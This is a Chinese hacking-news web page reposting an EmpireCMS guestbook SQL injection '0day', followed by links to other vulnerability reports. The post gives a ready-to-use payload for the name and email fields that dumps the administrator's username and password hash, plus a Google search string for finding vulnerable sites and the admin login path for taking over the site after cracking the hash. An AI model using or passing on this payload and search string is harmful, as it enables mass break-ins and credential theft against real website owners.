安全黑客
当前位置:安全黑客文章资讯安全漏洞最新漏洞
日期:2009-07-13 22:49:00  来源:本站整理

<b>帝国CMS的最新0day</b>[最新漏洞]

赞助商链接



  本文“<b>帝国CMS的最新0day</b>[最新漏洞]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

 
找到利用帝国CMS的站,网址背面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
接洽邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码

测试办法:操纵谷歌搜索关键字 inurl:e/tool/gbook/?bid=1,然后按照上面方法留言,显示后果即爆出管理员帐号和密码md5值,破解密码登陆后台.

后台/e/admin/
 


  以上是“<b>帝国CMS的最新0day</b>[最新漏洞]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • HP智能管理中心FaultDownloadServlet信息泄露漏洞
  • Palo Alto Networks的防火墙到一个新的水平
  • LTE带来了新的安全问题,电信运营商
  • iPhone的Multi-Touch技术的MacBook在10月?
  • McAfee的SmartFilter管理服务器SFAdminSrv.exe JBoss的RMI远程执行代码Vulnerabilty
  • Oracle表格识别CroScPlt.dll ActiveX控件远程代码执行Vulnerabilty
  • Oracle的WebCenter表格识别Sssplt30.ocx ActiveX控件远程代码执行Vulnerabilty的
  • RealNetworks公司的RealPlayer IVR MLTI块长度解析远程代码执行漏洞
  • HP Data Protector的笔记本电脑扩展策略服务器LogBackupLocationStatus远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本扩展策略服务器LogClientInstallation远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本扩展GetPolicies远程SQL注入Vulnerabilty
  • HP Data Protector的笔记本电脑扩展策略服务器RequestCopy远程SQL注入Vulnerabilty
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .